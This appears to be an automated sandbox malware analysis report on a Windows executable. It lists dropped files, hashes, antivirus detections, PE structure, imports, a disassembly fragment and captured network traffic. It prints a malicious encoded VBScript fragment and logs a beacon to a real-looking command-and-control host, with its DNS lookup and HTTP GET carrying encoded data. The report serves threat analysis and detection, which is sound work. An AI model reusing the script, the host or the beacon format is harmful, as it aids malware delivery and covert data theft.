                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1740
                            Entropy (8bit):5.360872475306136
                            Encrypted:false
                            SSDEEP:48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
                            MD5:7AC9E3ED5E1926DAE60D44553AFE67FE
                            SHA1:1EC2BB13633A3C21E2F3206696D89876B15E160F
                            SHA-256:97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
                            SHA-512:D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\Recovery\explorer.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1281
                            Entropy (8bit):5.367899416177239
                            Encrypted:false
                            SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                            MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                            SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                            SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                            SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                            Malicious:false
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):154
                            Entropy (8bit):5.614624794634796
                            Encrypted:false
                            SSDEEP:3:cBc8BBt/giiYhRD7GRLCnkSjsVWxyAUjI312vAGcCpYr2xiUdqJdn:cBjN3HD7GRSkQ1sjI2KixiEMdn
                            MD5:D25ABFBDB53986A76D2E91619515E94B
                            SHA1:059306BB7234709E1B826B215F24C5561ED6A9EA
                            SHA-256:35FB906845BCF87A2421D62B7E27AEF8763BB4DEE99BD481D7181D5197A38275
                            SHA-512:B88DF941C731D7893068FE326596E57C0EF9C0ED02291E2B04234757E73EA8C259B87A7069453E0FF8A900AAA87543E6D83D353CA52E3CC92C904E48C9F9927B
                            Malicious:false
                            Preview:5lCSyb9W0OFdHZOGiV173GdgDkedz4MAPmagmXmXCjAv97hqcvw6pgPzIgON7fh6CFNe8rdLsd4UFrgFDxBEIQVsXlYGIYahCEt4tCsvRlNLm4ta9JKJecyvteGXSXCTDXSA8mVAFQwgDJGc18G8ORCjQ8
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                             • Antivirus: Avira, Detection: 100%
                             • Antivirus: Joe Sandbox ML, Detection: 100%
                             • Antivirus: Virustotal, Detection: 55%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):773
                            Entropy (8bit):5.88188550946202
                            Encrypted:false
                            SSDEEP:24:2H1Kni1gTAx6cexSqZrFMp4xP6kokJMjdrcf:QKmgDZk4xPZoAMjpcf
                            MD5:44C69EB09C48C916E503CE08DF5C4A0A
                            SHA1:5B8EA8066FB5DBD65076B0CDF2E53281EA05AE1A
                            SHA-256:AF9F089D501BED940AE6ED794E165E76B2E077020A4A9516528131537C52050C
                            SHA-512:D29B7F2723A43AAA7519CFBEA3D1946C01932BAC755819A2B5EA779DD20312BF1294956E0995F185EA0FA6AB47B914DF485E4BA0839B459584288EA6338AB061
                            Malicious:false
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 70%
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):402
                            Entropy (8bit):5.875646102875155
                            Encrypted:false
                            SSDEEP:6:hwXJCT93EfPWpqBWxg6wGyxNCigxRnwo75OcbOLwFvxD+PXRKDHYZQEW2HMn:ICyMqwGNChRn3NqLG5q/RcHkgn
                            MD5:7734AF8B276980372DA8BE8AA89AB8B3
                            SHA1:6D1681C0B7B62DABAAE9EBD46295204DD8400E91
                            SHA-256:CCA27072E563DDBF09DBAB445473049555FA54BFD69A9007ECA4F2A5E35C22E2
                            SHA-512:4EF5E0F8CA8A5EF77B3CC6D23A9B6D2D5A58DD00ADEAD06AE5D14BA41ECD3BF5863E22C06C58C5E199D8927B7AA472AF3FAE84673681BF63125491957F90D6D3
                            Malicious:false
                            Preview:5iXxRGQqVqBQ2z7Z1c9zk0EikaRNRO7yKnv4SXaXBmNAPCvpFEQlLwxFeyN0zDZGtNGPEDGeCly8mDThpmHM7WnX0pZdKji8NGQC6flB7wij8zdafpLM5MJWksYYnmUcC0ugwRlJBFPLxDZAM98eXWCA64bNHMXUcFgIE6nOECL078jhTYLoozFqytj2zYCys4srgQ5PWtaVKMD8V43sAtqmAzTUXuYqAWHCP1BCc6R4Yufmqkh4eTx8OFrq7k1lUuUyEAsd30QEbvOQUrowNeLriJyJKUF1EqkoZrip1DBnCtgc1aWP6FY0inQ4LjTivYAvLj0mJ94JchozmWRt8059RtFwbndSuc2nsuRSktF7KOYB9aRzRjj4dBdbeELgfmZ9pAG1E9IPu8yDVE
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):47
                            Entropy (8bit):4.266730872678045
                            Encrypted:false
                            SSDEEP:3:I5gTlMkjLYjWJ:Iwlp3Yje
                            MD5:665BDA14C5E0F28A4FCAAB8726DC6EBE
                            SHA1:16DEB93757751E2D66E05C2C22505DB113FA96BA
                            SHA-256:09C3E02A4CAAD39E7C91F0BA1CC93C8C727D23B306DA9129CCA1D0955880C33E
                            SHA-512:51E85507A8C515FB3FE854A5D969C83D4C6ADD05284A11232B773EEBD19BA2B148B01CE116D65D6BF7CDFC13064ABFF8F0E69825630446E00B7846EB16ED8CB5
                            Malicious:false
                            Preview:"C:\comproviderRuntimecommon\chainsavesref.exe"
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):848384
                            Entropy (8bit):6.083714696898079
                            Encrypted:false
                            SSDEEP:12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
                            MD5:4EAF964B744BD6801B5122AE1AFBBDE4
                            SHA1:6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
                            SHA-256:B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
                            SHA-512:DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 70%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\comproviderRuntimecommon\chainsavesref.exe
                            File Type:ASCII text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):965
                            Entropy (8bit):5.895969511903032
                            Encrypted:false
                            SSDEEP:24:zMVH2Kc2dETTXdla3efM2QfnZ6qHy8ikD5Fk6KlRw34Y5:zYo2CXdieb+Z6qHy8hND
                            MD5:B052857C9DE3DD65305100232C55ECF0
                            SHA1:5789A2644F17F918F162833FE4977F7139A5C132
                            SHA-256:A3BC14FFE5D7BD3FD68E643E3CC08A101E06659B2E2B30AA57D65C44CE156D90
                            SHA-512:2DA5D25FCB1B0D7AEE2275B7E4336DE8D9DE80B3C0999D6C6752DB114CF3ED9E46826F4608A90D8FEA6A058D9DA4CCAB8F4DC1D4CA594CE30A52092C2DA28599
                            Malicious:false
                            Process:C:\Users\user\Desktop\cDouNOFXle.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):221
                            Entropy (8bit):5.869799958312498
                            Encrypted:false
                            SSDEEP:6:G5kgwqK+NkLzWbHa/818nZNDd3RL1wQJRrbXb79x5BD9ZpWS1:G6BMCzWLaG4d3XBJhfbb1
                            MD5:57F4CBF8C281ACDE2C48327DFB2B3C45
                            SHA1:F752FF26E32BED28F91712E5322D438ADAE0D6F4
                            SHA-256:0864BAA556ADDDC451E8AD0ACBDFBAF692A7371A5CBB8EF2B2B83AA05C56FB39
                            SHA-512:CF9EF8920DF9E3BD5CB9F907616C48BF0267DF974987774495F84D49999E54A626F96B8221DDA23ABBED5E753C1F53725FFE896A43B0CBA41EE0EACDC1F6BDDB
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            Preview:#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJmGswMW\bN..I!xOks+^Gs:W.&fdSk"X1Mt:d&X uu(oWmc8lDJS~Z~PWC^/nvT4AAA==^#~@.
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.441074143240984
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            • Win32 Executable (generic) a (10002005/4) 49.97%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:cDouNOFXle.exe
                            File size:1232540
                            MD5:54172888b473f2515b13fe1e2032a112
                            SHA1:fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
                            SHA256:05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
                            SHA512:d09ce140712a46f3f94eaaf0c567ca30ce6de8b81ed8b45961cf6f4211225b43e6944dba769c212e11f836cf579932883a28d798353af9d6bd71c40e8a8f90a5
                            SSDEEP:12288:WRZ+IoG/n9IQxW3OBseWyx/bl84s165YnPKDGWcvOarVwvZDyg7VGNtImleJS:Q2G/nvxW3Ww4DW1IDGWcmarVKFPJS
                            TLSH:AE454B017E44CE52F0181633C2FF45988BB4A9503AA6E31B7EB9377D65223967C0DADB
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                            Icon Hash:fbb99bdaecbcdce8
                            Entrypoint:0x41ec40
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                            Instruction
                            call 00007FFA04AE8CB9h
                            jmp 00007FFA04AE86CDh
                            cmp ecx, dword ptr [0043E668h]
                            jne 00007FFA04AE8845h
                            ret
                            jmp 00007FFA04AE8E3Eh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push esi
                            push dword ptr [ebp+08h]
                            mov esi, ecx
                            call 00007FFA04ADB5D7h
                            mov dword ptr [esi], 00435580h
                            mov eax, esi
                            pop esi
                            pop ebp
                            retn 0004h
                            and dword ptr [ecx+04h], 00000000h
                            mov eax, ecx
                            and dword ptr [ecx+08h], 00000000h
                            mov dword ptr [ecx+04h], 00435588h
                            mov dword ptr [ecx], 00435580h
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            lea eax, dword ptr [ecx+04h]
                            mov dword ptr [ecx], 00435568h
                            push eax
                            call 00007FFA04AEB9DDh
                            pop ecx
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 0Ch
                            lea ecx, dword ptr [ebp-0Ch]
                            call 00007FFA04ADB56Eh
                            push 0043B704h
                            lea eax, dword ptr [ebp-0Ch]
                            push eax
                            call 00007FFA04AEB0F2h
                            int3
                            push ebp
                            mov ebp, esp
                            sub esp, 0Ch
                            lea ecx, dword ptr [ebp-0Ch]
                            call 00007FFA04AE87E4h
                            push 0043B91Ch
                            lea eax, dword ptr [ebp-0Ch]
                            push eax
                            call 00007FFA04AEB0D5h
                            int3
                            jmp 00007FFA04AED123h
                            jmp dword ptr [00433260h]
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push 00421EB0h
                            push dword ptr fs:[00000000h]
                            Programming Language:
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2015 UPD3.1 build 24215
                            • [EXP] VS2015 UPD3.1 build 24215
                            • [RES] VS2015 UPD3 build 24213
                            • [LNK] VS2015 UPD3.1 build 24215
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x1e494 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x82000 | 0x2268 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x310ea | 0x31200 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata | 0x33000 | 0xa612 | 0xa800 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data | 0x3e000 | 0x23728 | 0x1000 | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didat | 0x62000 | 0x188 | 0x200 | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x63000 | 0x1e494 | 0x1e600 | False | 0.2540991512345679 | data | 6.688895303072544 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0x82000 | 0x2268 | 0x2400 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            Name | RVA | Size | Type | Language | Country
                            PNG | 0x63614 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
                            PNG | 0x6415c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
                            RT_ICON | 0x65708 | 0x1514 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                            RT_ICON | 0x66c1c | 0x10828 | data | |
                            RT_ICON | 0x77444 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4284900196, next used block 4284900196 | |
                            RT_ICON | 0x7b66c | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4283782754, next used block 4285426547 | |
                            RT_ICON | 0x7dc14 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4286412417, next used block 4285688944 | |
                            RT_ICON | 0x7ecbc | 0x468 | GLS_BINARY_LSB_FIRST | |
                            RT_DIALOG | 0x7f124 | 0x286 | data | English | United States
                            RT_DIALOG | 0x7f3ac | 0x13a | data | English | United States
                            RT_DIALOG | 0x7f4e8 | 0xec | data | English | United States
                            RT_DIALOG | 0x7f5d4 | 0x12e | data | English | United States
                            RT_DIALOG | 0x7f704 | 0x338 | data | English | United States
                            RT_DIALOG | 0x7fa3c | 0x252 | data | English | United States
                            RT_STRING | 0x7fc90 | 0x1e2 | data | English | United States
                            RT_STRING | 0x7fe74 | 0x1cc | data | English | United States
                            RT_STRING | 0x80040 | 0x1b8 | data | English | United States
                            RT_STRING | 0x801f8 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
                            RT_STRING | 0x80340 | 0x446 | data | English | United States
                            RT_STRING | 0x80788 | 0x166 | data | English | United States
                            RT_STRING | 0x808f0 | 0x152 | data | English | United States
                            RT_STRING | 0x80a44 | 0x10a | data | English | United States
                            RT_STRING | 0x80b50 | 0xbc | data | English | United States
                            RT_STRING | 0x80c0c | 0xd6 | data | English | United States
                            RT_GROUP_ICON | 0x80ce4 | 0x5a | data | |
                            RT_MANIFEST | 0x80d40 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
                            DLL | Import
                            KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                            gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                            Language of compilation system | Country where language is spoken | Map
                            English | United States |
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Aug 6, 2022 00:53:01.227482080 CEST | 58981 | 53 | 192.168.2.3 | 8.8.8.8
                            Aug 6, 2022 00:53:01.245068073 CEST | 53 | 58981 | 8.8.8.8 | 192.168.2.3
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Aug 6, 2022 00:53:01.227482080 CEST | 192.168.2.3 | 8.8.8.8 | 0x8e7 | Standard query (0) | a0702220.xsph.ru | A (IP address) | IN (0x0001)
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Aug 6, 2022 00:53:01.245068073 CEST | 8.8.8.8 | 192.168.2.3 | 0x8e7 | No error (0) | a0702220.xsph.ru | | 141.8.195.65 | A (IP address) | IN (0x0001)
                            • a0702220.xsph.ru
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.3 | 49779 | 141.8.195.65 | 80 | C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Aug 6, 2022 00:53:01.378452063 CEST | 1636 | OUT | GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1
                            Accept: */*
                            Content-Type: text/csv
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                            Host: a0702220.xsph.ru
                            Connection: Keep-Alive
                            Aug 6, 2022 00:53:01.444070101 CEST | 1676 | IN | HTTP/1.1 403 Forbidden
                            Server: openresty
                            Date: Fri, 05 Aug 2022 22:53:01 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Vary: Accept-Encoding
